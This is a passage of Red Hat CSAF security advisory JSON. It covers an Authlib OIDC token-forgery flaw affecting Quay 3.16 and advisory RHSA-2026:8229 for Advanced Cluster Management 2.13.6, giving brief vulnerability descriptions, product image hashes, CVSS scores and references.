"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2448182"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect (OIDC) servers. This vulnerability allows a remote attacker to bypass critical integrity checks in OIDC ID Tokens. Specifically, the library\u0027s internal hash verification logic fails open when encountering an unsupported cryptographic algorithm, accepting a forged ID Token as valid. This can lead to an authentication bypass, granting unauthorized access to systems relying on Authlib for OIDC authentication.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "authlib: Authlib: Authentication bypass via forged OpenID Connect ID Tokens",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This IMPORTANT vulnerability in Authlib allows attackers to bypass OIDC ID Token integrity verification. The at_hash and c_hash validation fails open for unknown algorithms, accepting forged tokens as valid. Exploitation requires no authentication or user interaction. Impact is high to confidentiality and integrity. Red Hat products using Authlib for OIDC validation are affected. Fixed in version 1.6.9.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-28498"
},
{
"category": "external",
"summary": "RHBZ#2448182",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448182"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-28498",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28498"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-28498",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28498"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/b9bb2b25bf8b7e01512d847a95c1749646eaa72b",
"url": "https://github.com/authlib/authlib/commit/b9bb2b25bf8b7e01512d847a95c1749646eaa72b"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/releases/tag/v1.6.9",
"url": "https://github.com/authlib/authlib/releases/tag/v1.6.9"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/security/advisories/GHSA-m344-f55w-2m6j",
"url": "https://github.com/authlib/authlib/security/advisories/GHSA-m344-f55w-2m6j"
}
],
"release_date": "2026-03-16T18:03:28.821000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T15:21:25+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6567"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "authlib: Authlib: Authentication bypass via forged OpenID Connect ID Tokens"
}
]
}
RHSA-2026:8229
Vulnerability from csaf_redhat - Published: 2026-04-15 02:15 - Updated: 2026-04-16 11:09A flaw was found in Lodash. A prototype pollution vulnerability in the _.unset and _.omit functions allows an attacker able to control property paths to delete methods from global prototypes. By removing essential functionalities, this can result in a denial of service.
A flaw was found in the archive/tar package in the Go standard library. tar.Reader does not set a maximum size on the number of sparse region data blocks in GNU tar pax 1.0 sparse files. A specially crafted tar archive with a pax header indicating a big number of sparse regions can cause a Go program to try to allocate a large amount of memory, causing an out-of-memory condition and resulting in a denial of service.
A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.
An authorization error has been discovered in Grafana dashboards. The dashboard permissions API does not verify the target dashboard scope and only checks the dashboards.permissions:* action. As a result, a user who has permission management rights on one dashboard can read and modify permissions on other dashboards. This is an organization‑internal privilege escalation.
A cross site scripting flaw has been discovered in the npm react-router and @remix-run/router packages. React Router (and Remix v1/v2) SPA open navigation redirects originating from loaders or actions in Framework Mode, Data Mode, or the unstable RSC modes can result in unsafe URLs causing unintended javascript execution on the client. This is only an issue if you are creating redirect paths from untrusted content or via an open redirect.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
| URL | Category | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat Advanced Cluster Management for Kubernetes 2.13 General\nAvailability release images, which add new features and enhancements, bug\nfixes, and updated container images.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Advanced Cluster Management for Kubernetes 2.13 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in.\n\nThis advisory contains the container images for Red Hat Advanced Cluster\nManagement for Kubernetes, which add new features and enhancements, bug\nfixes, and updated container images. See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://docs.redhat.com/en/documentation/red_hat_advanced_cluster_management_for_kubernetes/2.13/html-single/release_notes/index#acm-release-notes",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:8229",
"url": "https://access.redhat.com/errata/RHSA-2026:8229"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-13465",
"url": "https://access.redhat.com/security/cve/CVE-2025-13465"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-58183",
"url": "https://access.redhat.com/security/cve/CVE-2025-58183"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61728",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-21721",
"url": "https://access.redhat.com/security/cve/CVE-2026-21721"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-22029",
"url": "https://access.redhat.com/security/cve/CVE-2026-22029"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_8229.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Advanced Cluster Management for Kubernetes v2.13.6 security update",
"tracking": {
"current_release_date": "2026-04-16T11:09:36+00:00",
"generator": {
"date": "2026-04-16T11:09:36+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:8229",
"initial_release_date": "2026-04-15T02:15:09+00:00",
"revision_history": [
{
"date": "2026-04-15T02:15:09+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-15T02:15:19+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T11:09:36+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product": {
"name": "Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:acm:2.13::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Advanced Cluster Management for Kubernetes"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-cli-rhel9@sha256%3A01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915148"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"product_id": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cert-policy-controller-rhel9@sha256%3Af6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915173"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"product_id": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-backup-rhel9-operator@sha256%3Af4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915147"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-cluster-permission-rhel9@sha256%3Ad1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775441299"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"product_id": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/config-policy-controller-rhel9@sha256%3Ab3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915248"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"product_id": "registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"product_identification_helper": {
"purl": "pkg:oci/console-rhel9@sha256%3A82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775116130"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"product_id": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"product_identification_helper": {
"purl": "pkg:oci/endpoint-monitoring-rhel9-operator@sha256%3Aeaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915416"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-addon-controller-rhel9@sha256%3Ab6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915330"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-framework-addon-rhel9@sha256%3A6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915336"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"product_id": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"product_identification_helper": {
"purl": "pkg:oci/governance-policy-propagator-rhel9@sha256%3A54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915333"
}
}
},
{
"category": "product_version",
